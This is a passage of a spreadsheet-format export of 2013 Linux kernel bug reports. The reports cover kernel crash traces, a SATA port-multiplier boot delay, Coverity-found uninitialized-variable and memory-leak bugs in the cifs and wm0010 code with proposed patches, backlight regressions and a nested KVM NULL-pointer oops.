10:44:38 ship1 kernel: [&lt;c017e397&gt;] ? call_rcu_sched+0x17/0x20 Jul 5 10:44:38 ship1 kernel: [&lt;c017e397&gt;] ? call_rcu_sched+0x17/0x20 Jul 5 10:44:38 ship1 kernel: [&lt;c012d6a9&gt;] ? release_task+0x1d9/0x310 Jul 5 10:44:38 ship1 kernel: [&lt;c012ce01&gt;] ? exit_mm+0x1/0x100 Jul 5 10:44:38 ship1 kernel: [&lt;c014978a&gt;] ? switch_task_namespaces+0x1a/0x50 Jul 5 10:44:38 ship1 kernel: [&lt;c03cf8de&gt;] schedule+0x1e/0x50 Jul 5 10:44:38 ship1 kernel: [&lt;c012eacf&gt;] do_exit+0x4cf/0x7d0 Jul 5 10:44:38 ship1 kernel: [&lt;c03cdd7b&gt;] ? printk+0x38/0x3a Jul 5 10:44:38 ship1 kernel: [&lt;c0105726&gt;] oops_end+0x86/0xd0 Jul 5 10:44:38 ship1 kernel: [&lt;c01228a8&gt;] no_context+0xd8/0x1a0 Jul 5 10:44:38 ship1 kernel: [&lt;c0122a15&gt;] __bad_area_nosemaphore+0xa5/0x140 Jul 5 10:44:38 ship1 kernel: [&lt;c0122ac2&gt;] bad_area_nosemaphore+0x12/0x20 Jul 5 10:44:38 ship1 kernel: [&lt;c0122f39&gt;] do_page_fault+0x279/0x400 Jul 5 10:44:38 ship1 kernel: [&lt;c035ed00&gt;] ? netlink_broadcast_filtered+0x1d0/0x340 Jul 5 10:44:38 ship1 kernel: [&lt;c035ee95&gt;] ? netlink_broadcast+0x25/0x30 Jul 5 10:44:38 ship1 kernel: [&lt;c029c0cc&gt;] ? acpi_bus_generate_netlink_event+0xfd/0x109 Jul 5 10:44:38 ship1 kernel: [&lt;c0122cc0&gt;] ? mm_fault_error+0x170/0x170 Jul 5 10:44:38 ship1 kernel: [&lt;c03d0a0a&gt;] error_code+0x5a/0x60 Jul 5 10:44:38 ship1 kernel: [&lt;c0122cc0&gt;] ? mm_fault_error+0x170/0x170 Jul 5 10:44:38 ship1 kernel: [&lt;c02a1a99&gt;] ? acpi_ev_notify_dispatch+0x4e/0x61 Jul 5 10:44:38 ship1 kernel: [&lt;c0294cc7&gt;] acpi_os_execute_deferred+0x1d/0x28 Jul 5 10:44:38 ship1 kernel: [&lt;c013e4fb&gt;] process_one_work+0xfb/0x340 Jul 5 10:44:38 ship1 kernel: [&lt;c0294caa&gt;] ? acpi_os_wait_events_complete+0x19/0x19 Jul 5 10:44:38 ship1 kernel: [&lt;c013ea70&gt;] worker_thread+0x140/0x3a0 Jul 5 10:44:38 ship1 kernel: [&lt;c013e930&gt;] ? manage_workers+0x1f0/0x1f0 Jul 5 10:44:38 ship1 kernel: [&lt;c0144354&gt;] kthread+0x74/0x80 Jul 5 10:44:38 ship1 kernel: [&lt;c01442e0&gt;] ? kthread_freezable_should_stop+0x60/0x60 Jul 5 10:44:38 ship1 kernel: [&lt;c03d11b6&gt;] kernel_thread_helper+0x6/0xd Jul 5 10:44:38 ship1 kernel: Code: 90 55 64 a1 ac c5 51 c0 8b 80 74 01 00 00 89 e5 5d 8b 40 f8 c3 8d b6 00 00 00 00 8d bf 00 00 00 00 55 8b 80 74 01 00 00 89 e5 5d &lt;8b&gt; 40 fc c3 66 90 55 31 c0 89 e5 5d c3 89 f6 8d bc 27 00 00 00 Jul 5 10:44:38 ship1 kernel: EIP: [&lt;c0143f3a&gt;] kthread_data+0xa/0x10 SS:ESP 0068:dfa99ce4 Jul 5 10:44:38 ship1 kernel: CR2: 00000000fffffffc Jul 5 10:44:38 ship1 kernel: ---[ end trace 11fc5ca1174c2a78 ]---</t>
  </si>
  <si>
    <t>SATA Multiplier Timeout instead of automatic spin-up severly prolongs boot</t>
  </si>
  <si>
    <t>2013-07-21 10:26 UTC</t>
  </si>
  <si>
    <t>Rene Schickbauer</t>
  </si>
  <si>
    <t>2013-11-12 14:57 UTC</t>
  </si>
  <si>
    <t>Created attachment 106976 [details] Patch: Disable Soft resets I have an external housing with 15 disks, (with 3 SATA multipliers a 5 disks each as far as i can tell). [ 5.544035] ata4: SATA link up 3.0 Gbps (SStatus 123 SControl 0) [ 5.544331] ata4.15: Port Multiplier 1.1, 0x1095:0x3726 r23, 6 ports, feat 0x1/0x9 [ 5.545460] ata4.00: hard resetting link This housing is configured to NOT spin up the disks on power on. Booting up take extremly long, on the order of 5 minutes or so. The problem is, instead of spinning up the disks via software, after accessing each disk for the first time, the kernel goes into an error condition and starts from the beginning: [ 16.428193] ata4.01: SATA link up 3.0 Gbps (SStatus 123 SControl 320) [ 16.428225] ata4.02: hard resetting link [ 26.428023] ata4.02: softreset failed (timeout) [ 29.428038] ata4.15: qc timeout (cmd 0xe4) [ 29.428051] ata4.02: failed to read SCR 0 (Emask=0x5) [ 29.428055] ata4.02: reset failed, giving up [ 29.428104] ata4.15: hard resetting link [ 39.436023] ata4.15: softreset failed (timeout) [ 39.436068] ata4.15: hard resetting link [ 41.636029] ata4.15: SATA link up 3.0 Gbps (SStatus 123 SControl 0) [ 41.636260] ata4.00: hard resetting link [ 41.988175] ata4.00: SATA link up 3.0 Gbps (SStatus 123 SControl 320) [ 41.988201] ata4.01: hard resetting link [ 42.340177] ata4.01: SATA link up 3.0 Gbps (SStatus 123 SControl 320) [ 42.340203] ata4.02: hard resetting link [ 42.692175] ata4.02: SATA link up 3.0 Gbps (SStatus 123 SControl 320) [ 42.692200] ata4.03: hard resetting link [ 52.692023] ata4.03: softreset failed (timeout) [ 55.692028] ata4.15: qc timeout (cmd 0xe4) .... and so on. Looking at the storage housing, i can see that the kernel tries to access the first disk (and i hear it spinning up) and the screen show immediatly a timeout. Then nothing happens for a number of seconds, the kernel accesses the first disk again (succeding) and times out while the seconds disk is spinning up and so on. After the first five disks are spun up (first multiplier), the kernel accesses all disks once more (after the last multiplier reset) and succeeds, and then gets stuck on the second multiplier. And then on the third... I can't be certain of that, but i'm pretty sure i hear the already spun up disks parking/unparking the heads when the multiplier gets reset (which can't be good, either). I think the correct solution would be to implement a staggered spin-up of the disks. Like sending a spin-up command (or whatever the kernel usually uses to wake up disks) to all ports of the multiplier, delayed by 250ms or so, before doing the the disk detection. This should speed up boot considerably and will most likely reduce wear on the disks. I managed to get the boot delays down to a few seconds by disabling soft resets on the multiplexer (see attached patch). This is the same workaround that's already in the kernel for some other multiplexers. [ 6.990717] EXT4-fs (sdb1): mounted filesystem with ordered data mode. Opts: (null) [ 9.116035] ata10: SATA link up 3.0 Gbps (SStatus 123 SControl 0) [ 9.116322] ata10.15: Port Multiplier 1.1, 0x1095:0x3726 r23, 6 ports, feat 0x1/0x9 [ 9.117397] ata10.00: hard resetting link [ 9.436262] ata10.00: SATA link up 3.0 Gbps (SStatus 123 SControl 320) [ 9.436343] ata10.01: hard resetting link [ 9.756282] ata10.01: SATA link up 3.0 Gbps (SStatus 123 SControl 320) [ 9.756369] ata10.02: hard resetting link [ 9.814423] Adding 4191228k swap on /dev/sdb5. Priority:-1 extents:1 across:4191228k [ 10.076264] ata10.02: SATA link up 3.0 Gbps (SStatus 123 SControl 320) [ 10.076350] ata10.03: hard resetting link [ 10.396281] ata10.03: SATA link up 3.0 Gbps (SStatus 123 SControl 320) [ 10.396364] ata10.04: hard resetting link [ 10.451568] EXT4-fs (sdb1): re-mounted. Opts: errors=remount-ro [ 10.716264] ata10.04: SATA link up 3.0 Gbps (SStatus 123 SControl 320) [ 10.716350] ata10.05: hard resetting link [ 11.036265] ata10.05: SATA link up 1.5 Gbps (SStatus 113 SControl 320) [ 12.191655] SGI XFS with ACLs, security attributes, realtime, large block/inode numbers, no debug enabled [ 12.194589] XFS (sda): Mounting Filesystem This bug was originally reported to uBuntu via Launchpad: https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1193809 ProblemType: Bug DistroRelease: Ubuntu 13.04 Package: linux-image-3.8.0-23-generic 3.8.0-23.34 ProcVersionSignature: Ubuntu 3.8.0-23.34-generic 3.8.11 Uname: Linux 3.8.0-23-generic x86_64 NonfreeKernelModules: nvidia ApportVersion: 2.9.2-0ubuntu8.1 Architecture: amd64 AudioDevicesInUse: Error: command ['fuser', '-v', '/dev/snd/seq', '/dev/snd/timer'] failed with exit code 1: CRDA: Error: command ['iw', 'reg', 'get'] failed with exit code 1: nl80211 not found. Date: Sun Jun 23 12:38:49 2013 HibernationDevice: RESUME=UUID=40dffe0d-945c-43d2-b196-783d72d41937 InstallationDate: Installed on 2013-01-28 (145 days ago) InstallationMedia: Xubuntu 12.10 "Quantal Quetzal" - Release amd64 (20121017.1) IwConfig: eth5 no wireless extensions. eth6 no wireless extensions. lo no wireless extensions. Lsusb: Bus 002 Device 002: ID 046d:c018 Logitech, Inc. Optical Wheel Mouse Bus 002 Device 003: ID 051d:0002 American Power Conversion Uninterruptible Power Supply Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub MachineType: empty empty MarkForUpload: True ProcFB: ProcKernelCmdLine: BOOT_IMAGE=/boot/vmlinuz-3.8.0-23-generic root=UUID=9bbfc83a-95f8-413a-b412-5b2091205864 ro RelatedPackageVersions: linux-restricted-modules-3.8.0-23-generic N/A linux-backports-modules-3.8.0-23-generic N/A linux-firmware 1.106 RfKill: SourcePackage: linux UpgradeStatus: Upgraded to raring on 2013-04-26 (57 days ago) dmi.bios.date: 10/22/2009 dmi.bios.vendor: American Megatrends Inc. dmi.bios.version: 'V2.06 ' dmi.board.asset.tag: empty dmi.board.name: S2932/S2932-E/S2932-SI dmi.board.vendor: TYAN Computer Corporation dmi.board.version: empty dmi.chassis.asset.tag: empty dmi.chassis.type: 3 dmi.chassis.vendor: empty dmi.chassis.version: empty dmi.modalias: dmi:bvnAmericanMegatrendsInc.:bvr'V2.06':bd10/22/2009:svnempty:pnempty:pvrempty:rvnTYANComputerCorporation:rnS2932/S2932-E/S2932-SI:rvrempty:cvnempty:ct3:cvrempty: dmi.product.name: empty dmi.product.version: empty dmi.sys.vendor: empty</t>
  </si>
  <si>
    <t>Kernel crashes after resume from ram, takes about an hour after resume</t>
  </si>
  <si>
    <t>3.10.0 3.10.1 3.10.2</t>
  </si>
  <si>
    <t>2013-07-23 18:37 UTC</t>
  </si>
  <si>
    <t>John Yost</t>
  </si>
  <si>
    <t>2013-08-29 21:56 UTC</t>
  </si>
  <si>
    <t>not real sure how to file so I have attached a picture of the error dump. I have several photos from additional dumps, but the system seems to only accept one. My system is an AsRock Z77 extreme 4 motherboard with an Intel core i5 3570k with kingston SSD 120GB 32G of ram and a 2TB hard drive running slackware 14.0 and KDE 4.10.5 The configuration for the kernel is from slackware current/testing config-generic ext4 filesystem. Please advise if you need anything additional. thanks john It seems my photo is too large, How do I get it to you?</t>
  </si>
  <si>
    <t>cifs/file.c: uninitialized scalar used</t>
  </si>
  <si>
    <t>3.11rc2</t>
  </si>
  <si>
    <t>2013-07-25 23:36 UTC</t>
  </si>
  <si>
    <t>2013-11-13 19:07 UTC</t>
  </si>
  <si>
    <t>Coverity CID 1056859 reports: 583cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush) 584{ 585 int rc = -EACCES; 586 unsigned int xid; 587 __u32 oplock; 588 struct cifs_sb_info *cifs_sb; 589 struct cifs_tcon *tcon; 590 struct TCP_Server_Info *server; 591 struct cifsInodeInfo *cinode; 592 struct inode *inode; 593 char *full_path = NULL; 594 int desired_access; 595 int disposition = FILE_OPEN; 596 int create_options = CREATE_NOT_DIR; 1. var_decl: Declaring variable "oparms" without initializer. 597 struct cifs_open_parms oparms; 598 2. Condition "1 /* 2 == 2 */", taking true branch 3. Condition "cifsFYI &amp; 1", taking true branch 4. Condition "debug_lockdep_rcu_enabled()", taking true branch 5. Condition "!__warned", taking true branch 6. Condition "0 /* !1 */", taking false branch 7. Falling through to end of if statement 599 xid = get_xid(); 600 mutex_lock(&amp;cfile-&gt;fh_mutex); 8. Condition "!cfile-&gt;invalidHandle", taking false branch 601 if (!cfile-&gt;invalidHandle) { 602 mutex_unlock(&amp;cfile-&gt;fh_mutex); 603 rc = 0; 604 free_xid(xid); 605 return rc; 606 } 607 608 inode = cfile-&gt;dentry-&gt;d_inode; 609 cifs_sb = CIFS_SB(inode-&gt;i_sb); 610 tcon = tlink_tcon(cfile-&gt;tlink); 611 server = tcon-&gt;ses-&gt;server; 612 613 /* 614 * Can not grab rename sem here because various ops, including those 615 * that already have the rename sem can end up causing writepage to get 616 * called and if the server was down that means we end up here, and we 617 * can never tell if the caller already has the rename_sem. 618 */ 619 full_path = build_path_from_dentry(cfile-&gt;dentry); 9. Condition "full_path == NULL", taking false branch 620 if (full_path == NULL) { 621 rc = -ENOMEM; 622 mutex_unlock(&amp;cfile-&gt;fh_mutex); 623 free_xid(xid); 624 return rc; 625 } 626 10. Condition "1 /* 2 == 2 */", taking true branch 11. Condition "cifsFYI &amp; 1", taking true branch 12. Falling through to end of if statement 627 cifs_dbg(FYI, "inode = 0x%p file flags 0x%x for %s\n", 628 inode, cfile-&gt;f_flags, full_path); 629 13. Condition "tcon-&gt;ses-&gt;server-&gt;oplocks", taking true branch 630 if (tcon-&gt;ses-&gt;server-&gt;oplocks) 14. Falling through to end of if statement 631 oplock = REQ_OPLOCK; 632 else 633 oplock = 0; 634 15. Condition "tcon-&gt;unix_ext", taking true branch 16. Condition "cap_unix(tcon-&gt;ses)", taking true branch 17. Condition "32 &amp; (__u64)(__le64)tcon-&gt;fsUnixInfo.Capability", taking true branch 635 if (tcon-&gt;unix_ext &amp;&amp; cap_unix(tcon-&gt;ses) &amp;&amp; 636 (CIFS_UNIX_POSIX_PATH_OPS_CAP &amp; 637 le64_to_cpu(tcon-&gt;fsUnixInfo.Capability))) { 638 /* 639 * O_CREAT, O_EXCL and O_TRUNC already had their effect on the 640 * original open. Must mask them off for a reopen. 641 */ 642 unsigned int oflags = cfile-&gt;f_flags &amp; 643 ~(O_CREAT | O_EXCL | O_TRUNC); 644 645 rc = cifs_posix_open(full_path, NULL, inode-&gt;i_sb, 646 cifs_sb-&gt;mnt_file_mode /* ignored */, 647 oflags, &amp;oplock, &amp;cfile-&gt;fid.netfid, xid); 18. Condition "rc == 0", taking true branch 648 if (rc == 0) { 19. Condition "1 /* 2 == 2 */", taking true branch 20. Condition "cifsFYI &amp; 1", taking true branch 21. Falling through to end of if statement 649 cifs_dbg(FYI, "posix reopen succeeded\n"); 22. Jumping to label "reopen_success" 650 goto reopen_success; 651 } 652 /* 653 * fallthrough to retry open the old way on errors, especially 654 * in the reconnect path it is important to retry hard 655 */ 656 } 657 658 desired_access = cifs_convert_flags(cfile-&gt;f_flags); 659 660 if (backup_cred(cifs_sb)) 661 create_options |= CREATE_OPEN_BACKUP_INTENT; 662 663 if (server-&gt;ops-&gt;get_lease_key) 664 server-&gt;ops-&gt;get_lease_key(inode, &amp;cfile-&gt;fid); 665 666 oparms.tcon = tcon; 667 oparms.cifs_sb = cifs_sb; 668 oparms.desired_access = desired_access; 669 oparms.create_options = create_options; 670 oparms.disposition = disposition; 671 oparms.path = full_path; 672 oparms.fid = &amp;cfile-&gt;fid; 673 oparms.reconnect = true; 674 675 /* 676 * Can not refresh inode by passing in file_info buf to be returned by 677 * CIFSSMBOpen and then calling get_inode_info with returned buf since 678 * file might have write behind data that needs to be flushed and server 679 * version of file size can be stale. If we knew for sure that inode was 680 * not dirty locally we could do this. 681 */ 682 rc = server-&gt;ops-&gt;open(xid, &amp;oparms, &amp;oplock, NULL); 683 if (rc == -ENOENT &amp;&amp; oparms.reconnect == false) { 684 /* durable handle timeout is expired - open the file again */ 685 rc = server-&gt;ops-&gt;open(xid, &amp;oparms, &amp;oplock, NULL); 686 /* indicate that we need to relock the file */ 687 oparms.reconnect = true; 688 } 689 690 if (rc) { 691 mutex_unlock(&amp;cfile-&gt;fh_mutex); 692 cifs_dbg(FYI, "cifs_reopen returned 0x%x\n", rc); 693 cifs_dbg(FYI, "oplock: %d\n", oplock); 694 goto reopen_error_exit; 695 } 696 697reopen_success: 698 cfile-&gt;invalidHandle = false; 699 mutex_unlock(&amp;cfile-&gt;fh_mutex); 700 cinode = CIFS_I(inode); 701 23. Condition "can_flush", taking true branch 702 if (can_flush) { 703 rc = filemap_write_and_wait(inode-&gt;i_mapping); 704 mapping_set_error(inode-&gt;i_mapping, rc); 705 24. Condition "tcon-&gt;unix_ext", taking true branch 706 if (tcon-&gt;unix_ext) 25. Falling through to end of if statement 707 rc = cifs_get_inode_info_unix(&amp;inode, full_path, 708 inode-&gt;i_sb, xid); 709 else 710 rc = cifs_get_inode_info(&amp;inode, full_path, NULL, 711 inode-&gt;i_sb, xid, NULL); 712 } 713 /* 714 * Else we are writing out data to server already and could deadlock if 715 * we tried to flush data, and since we do not know if we have data that 716 * would invalidate the current end of file on the server we can not go 717 * to the server to get the new inode info. 718 */ 719 720 server-&gt;ops-&gt;set_fid(cfile, &amp;cfile-&gt;fid, oplock); CID 1056859 (#1 of 1): Uninitialized scalar variable (UNINIT) 26. uninit_use: Using uninitialized value "oparms.reconnect". 721 if (oparms.reconnect) 722 cifs_relock_file(cfile); 723 724reopen_error_exit: 725 kfree(full_path); 726 free_xid(xid); 727 return rc; 728} I have no idea if this would actually work as a fix: --- a/fs/cifs/file.c +++ b/fs/cifs/file.c @@ -595,6 +595,7 @@ cifs_reopen_file(struct cifsFileInfo *cfile, bool can_flush) int disposition = FILE_OPEN; int create_options = CREATE_NOT_DIR; struct cifs_open_parms oparms; + oparms.reconnect = false; xid = get_xid(); mutex_lock(&amp;cfile-&gt;fh_mutex);</t>
  </si>
  <si>
    <t>sound/soc/codecs/wm0010.c: mem leaks on error path</t>
  </si>
  <si>
    <t>2013-07-29 20:38 UTC</t>
  </si>
  <si>
    <t>2013-11-13 16:35 UTC</t>
  </si>
  <si>
    <t>Coverity reports in CID 751483 and 751484: 346static int wm0010_firmware_load(const char *name, struct snd_soc_codec *codec) 347{ 348 struct spi_device *spi = to_spi_device(codec-&gt;dev); 349 struct wm0010_priv *wm0010 = snd_soc_codec_get_drvdata(codec); 350 struct list_head xfer_list; 351 struct wm0010_boot_xfer *xfer; 352 int ret; 353 struct completion done; 354 const struct firmware *fw; 355 const struct dfw_binrec *rec; 356 const struct dfw_inforec *inforec; 357 u64 *img; 358 u8 *out, dsp; 359 u32 len, offset; 360 361 INIT_LIST_HEAD(&amp;xfer_list); 362 363 ret = request_firmware(&amp;fw, name, codec-&gt;dev); 1. Condition "ret != 0", taking false branch 364 if (ret != 0) { 365 dev_err(codec-&gt;dev, "Failed to request application(%s): %d\n", 366 name, ret); 367 return ret; 368 } 369 370 rec = (const struct dfw_binrec *)fw-&gt;data; 371 inforec = (const struct dfw_inforec *)rec-&gt;data; 372 offset = 0; 373 dsp = inforec-&gt;dsp_target; 374 wm0010-&gt;boot_failed = false; 2. Condition "!list_empty(&amp;xfer_list)", taking false branch 375 BUG_ON(!list_empty(&amp;xfer_list)); 376 init_completion(&amp;done); 377 378 /* First record should be INFO */ 3. Condition "rec-&gt;command != DFW_CMD_INFO", taking false branch 379 if (rec-&gt;command != DFW_CMD_INFO) { 380 dev_err(codec-&gt;dev, "First record not INFO\r\n"); 381 ret = -EINVAL; 382 goto abort; 383 } 384 4. Condition "inforec-&gt;info_version != 1", taking false branch 385 if (inforec-&gt;info_version != INFO_VERSION) { 386 dev_err(codec-&gt;dev, 387 "Unsupported version (%02d) of INFO record\r\n", 388 inforec-&gt;info_version); 389 ret = -EINVAL; 390 goto abort; 391 } 392 5. Condition "!!(descriptor.flags &amp; (1 /* 1 &lt;&lt; 0 */))", taking true branch 6. Condition "!!(descriptor.flags &amp; (1 /* 1 &lt;&lt; 0 */))", taking true branch 393 dev_dbg(codec-&gt;dev, "Version v%02d INFO record found\r\n", 394 inforec-&gt;info_version); 395 396 /* Check it's a DSP file */ 7. Condition "dsp != 10", taking false branch 397 if (dsp != DEVICE_ID_WM0010) { 398 dev_err(codec-&gt;dev, "Not a WM0010 firmware file.\r\n"); 399 ret = -EINVAL; 400 goto abort; 401 } 402 403 /* Skip the info record as we don't need to send it */ 404 offset += ((rec-&gt;length) + 8); 405 rec = (void *)&amp;rec-&gt;data[rec-&gt;length]; 406 8. Condition "offset &lt; fw-&gt;size", taking true branch 407 while (offset &lt; fw-&gt;size) { 9. Condition "!!(descriptor.flags &amp; (1 /* 1 &lt;&lt; 0 */))", taking true branch 10. Condition "!!(descriptor.flags &amp; (1 /* 1 &lt;&lt; 0 */))", taking true branch 408 dev_dbg(codec-&gt;dev, 409 "Packet: command %d, data length = 0x%x\r\n", 410 rec-&gt;command, rec-&gt;length); 411 len = rec-&gt;length + 8; 412 413 out = kzalloc(len, GFP_KERNEL); 11. Condition "!out", taking false branch 414 if (!out) { 415 dev_err(codec-&gt;dev, 416 "Failed to allocate RX buffer\n"); 417 ret = -ENOMEM; 418 goto abort1; 419 } 420 12. alloc_fn: Storage is returned from allocation function "kzalloc(size_t, gfp_t)". [show details] 13. var_assign: Assigning: "img" = storage returned from "kzalloc(len, 208U)". 421 img = kzalloc(len, GFP_KERNEL); 14. Condition "!img", taking false branch 422 if (!img) { 423 dev_err(codec-&gt;dev, 424 "Failed to allocate image buffer\n"); 425 ret = -ENOMEM; 426 goto abort1; 427 } 428 15. noescape: Resource "img" is not freed or pointed-to in function "byte_swap_64(u64 *, u64 *, u32)". [show details] 429 byte_swap_64((u64 *)&amp;rec-&gt;command, img, len); 430 431 xfer = kzalloc(sizeof(*xfer), GFP_KERNEL); 16. Condition "!xfer", taking true branch 432 if (!xfer) { 433 dev_err(codec-&gt;dev, "Failed to allocate xfer\n"); 434 ret = -ENOMEM; 17. Jumping to label "abort1" 435 goto abort1; 436 } 437 438 xfer-&gt;codec = codec; 439 list_add_tail(&amp;xfer-&gt;list, &amp;xfer_list); 440 441 spi_message_init(&amp;xfer-&gt;m); 442 xfer-&gt;m.complete = wm0010_boot_xfer_complete; 443 xfer-&gt;m.context = xfer; 444 xfer-&gt;t.tx_buf = img; 445 xfer-&gt;t.rx_buf = out; 446 xfer-&gt;t.len = len; 447 xfer-&gt;t.bits_per_word = 8; 448 449 if (!wm0010-&gt;pll_running) { 450 xfer-&gt;t.speed_hz = wm0010-&gt;sysclk / 6; 451 } else { 452 xfer-&gt;t.speed_hz = wm0010-&gt;max_spi_freq; 453 454 if (wm0010-&gt;board_max_spi_speed &amp;&amp; 455 (wm0010-&gt;board_max_spi_speed &lt; wm0010-&gt;max_spi_freq)) 456 xfer-&gt;t.speed_hz = wm0010-&gt;board_max_spi_speed; 457 } 458 459 /* Store max usable spi frequency for later use */ 460 wm0010-&gt;max_spi_freq = xfer-&gt;t.speed_hz; 461 462 spi_message_add_tail(&amp;xfer-&gt;t, &amp;xfer-&gt;m); 463 464 offset += ((rec-&gt;length) + 8); 465 rec = (void *)&amp;rec-&gt;data[rec-&gt;length]; 466 467 if (offset &gt;= fw-&gt;size) { 468 dev_dbg(codec-&gt;dev, "All transfers scheduled\n"); 469 xfer-&gt;done = &amp;done; 470 } 471 472 ret = spi_async(spi, &amp;xfer-&gt;m); 473 if (ret != 0) { 474 dev_err(codec-&gt;dev, "Write failed: %d\n", ret); 475 goto abort1; 476 } 477 478 if (wm0010-&gt;boot_failed) { 479 dev_dbg(codec-&gt;dev, "Boot fail!\n"); 480 ret = -EINVAL; 481 goto abort1; 482 } 483 } 484 485 wait_for_completion(&amp;done); 486 487 ret = 0; 488 489abort1: 18. Condition "!list_empty(&amp;xfer_list)", taking false branch 490 while (!list_empty(&amp;xfer_list)) { 491 xfer = list_first_entry(&amp;xfer_list, struct wm0010_boot_xfer, 492 list); 493 kfree(xfer-&gt;t.rx_buf); 494 kfree(xfer-&gt;t.tx_buf); 495 list_del(&amp;xfer-&gt;list); 496 kfree(xfer); 497 } 498 499abort: 500 release_firmware(fw); CID 751483: Resource leak (RESOURCE_LEAK) [select issue] CID 751484 (#1 of 1): Resource leak (RESOURCE_LEAK) 19. leaked_storage: Variable "img" going out of scope leaks the storage it points to. 501 return ret; 502} It seems fix would be to assign allocated temporary buffers to xfer-&gt;t.rx_buf and xfer-&gt;t.tx_buf earlier since they get kfree()'d on error path: --- a/sound/soc/codecs/wm0010.c +++ b/sound/soc/codecs/wm0010.c @@ -417,6 +417,7 @@ static int wm0010_firmware_load(const char *name, struct snd _soc_codec *codec) ret = -ENOMEM; goto abort1; } + xfer-&gt;t.rx_buf = out; img = kzalloc(len, GFP_KERNEL); if (!img) { @@ -425,6 +426,7 @@ static int wm0010_firmware_load(const char *name, struct snd_soc_codec *codec) ret = -ENOMEM; goto abort1; } + xfer-&gt;t.tx_buf = img; byte_swap_64((u64 *)&amp;rec-&gt;command, img, len); @@ -441,8 +443,6 @@ static int wm0010_firmware_load(const char *name, struct snd_soc_codec *codec) spi_message_init(&amp;xfer-&gt;m); xfer-&gt;m.complete = wm0010_boot_xfer_complete; xfer-&gt;m.context = xfer; - xfer-&gt;t.tx_buf = img; - xfer-&gt;t.rx_buf = out; xfer-&gt;t.len = len; xfer-&gt;t.bits_per_word = 8;</t>
  </si>
  <si>
    <t>backlight regression</t>
  </si>
  <si>
    <t>3.11 rc3</t>
  </si>
  <si>
    <t>2013-07-29 23:05 UTC</t>
  </si>
  <si>
    <t>André</t>
  </si>
  <si>
    <t>2013-11-13 22:57 UTC</t>
  </si>
  <si>
    <t>intel-gfx-bugs@lists.freedesktop.org</t>
  </si>
  <si>
    <t>after upgrade from kernel 3.11rc2 to rc3 my backlight control dont work. my pc asus k56cb vga intel with optimus</t>
  </si>
  <si>
    <t>Backlight regression in ASUS Zenbok Prime UX31A</t>
  </si>
  <si>
    <t>3.11-rc3</t>
  </si>
  <si>
    <t>2013-08-01 18:46 UTC</t>
  </si>
  <si>
    <t>Felipe Contreras</t>
  </si>
  <si>
    <t>2013-09-05 05:55 UTC</t>
  </si>
  <si>
    <t>Created attachment 107075 [details] acpidump Commit efaa14c (ACPI / video: no automatic brightness changes by win8-compatible firmware) fixed the backlight controls when in win8 OSI mode, but introduced multiple issues. 1. The first boot afterwards happens with level 0 (the old level is not used) 2. Level 0 now turns the screen off, which didn't happen before (v3.6; the last time the backlight driver worked correctly) 3. Each time the backlight level is changed through X, a flash happens (level 100%, level 0%, and then the desired level). It works fine through sysfs though.</t>
  </si>
  <si>
    <t>L2 can't boot up when creating L1 with '-cpu host' qemu option</t>
  </si>
  <si>
    <t>3.11.0-RC1</t>
  </si>
  <si>
    <t>2013-08-02 06:33 UTC</t>
  </si>
  <si>
    <t>2013-08-13 07:36 UTC</t>
  </si>
  <si>
    <t>Created attachment 107077 [details] serial log of L1 guest Environment: ------------ Host OS (ia32/ia32e/IA64):ia32e Guest OS (ia32/ia32e/IA64):ia32e Guest OS Type (Linux/Windows):Linux kvm.git next Commit:bf640876e21fe603f7f52b0c27d66b7716da0384 qemu-kvm uq/master Commit:0779caeb1a17f4d3ed14e2925b36ba09b084fb7b Host Kernel Version:3.11.0-rc1 Hardware: SNB-EP Bug detailed description: -------------------------- create L1 guest with "-cpu host", then create a L2 guest, L1 will call trace and L2 can't boot up. note: 1. create L1 guest with "-cpu qemu64,+vmx", L2 guest works fine. 2. This should be a kvm bug. kvm + qemu-kvm = result bf640876 + 0779caeb = bad 6d128e1e + 0779caeb = good the first bad commit is: commit 21feb4eb64e21f8dc91136b91ee886b978ce6421 Author: Arthur Chunqi Li &lt;yzt356@gmail.com&gt; Date: Mon Jul 15 16:04:08 2013 +0800 KVM: nVMX: Set segment infomation of L1 when L2 exits Reproduce steps: ---------------- 1. create L1 guest: qemu-system-x86_64 -enable-kvm -m 4G -smp 4 -net nic,macaddr=00:12:46:09:13:56 -net tap,script=/etc/kvm/qemu-ifup nested-kvm.qcow 2. create L2 guest: qemu-system-x86_64 -enable-kvm -m 1024 -smp 2 -net none rhel6u4.img Current result: ---------------- L1 call trace; L2 can't boot up. Expected result: ---------------- L1 and L2 work fine Basic root-causing log: (in L1 guest) ---------------------- [ 94.585378] BUG: unable to handle kernel NULL pointer dereference at 0000000000000034 [ 94.586002] IP: [&lt;ffffffffa010bb26&gt;] write_segment_descriptor+0x66/0xa0 [kvm] [ 94.586002] PGD 0 [ 94.586002] Oops: 0000 [#1] SMP [ 94.586002] Modules linked in: fuse nfsv3 nfs_acl nfsv4 auth_rpcgss nfs fscache dns_resolver lockd sunrpc 8021q garp stp llc binfmt_misc uinput ppdev parport_pc parport kvm_intel kvm crc32c_intel ghash_clmulni_intel microcode pcspkr e1000 i2c_piix4 floppy(F) cirrus(F) ttm(F) drm_kms_helper(F) drm(F) i2c_core(F) [ 94.586002] CPU 0 [ 94.586002] Pid: 2132, comm: qemu-system-x86 Tainted: GF 3.8.5 #4 Bochs Bochs [ 94.586002] RIP: 0010:[&lt;ffffffffa010bb26&gt;] [&lt;ffffffffa010bb26&gt;] write_segment_descriptor+0x66/0xa0 [kvm] [ 94.586002] RSP: 0018:ffff880118d2bac8 EFLAGS: 00010246 [ 94.586002] RAX: 0000000000000000 RBX: ffff880106a79540 RCX: 0000000000000000 [ 94.586002] RDX: 0000000000001000 RSI: 0000000000000009 RDI: 00000000000000a0 [ 94.586002] RBP: ffff880118d2baf8 R08: 0000000000000008 R09: 00000000000000a0 [ 94.586002] R10: 0000000000000000 R11: 0000000000000000 R12: ffff880118d2bb38 [ 94.586002] R13: 0000000000000001 R14: 0000000000000008 R15: 0000000000000008 [ 94.586002] FS: 00007f83d3bb5700(0000) GS:ffff88011fc00000(0000) knlGS:0000000000000000 [ 94.586002] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 94.586002] CR2: 0000000000000034 CR3: 00000001069bf000 CR4: 00000000001427f0 [ 94.586002] DR0: 0000000000000000 DR1: 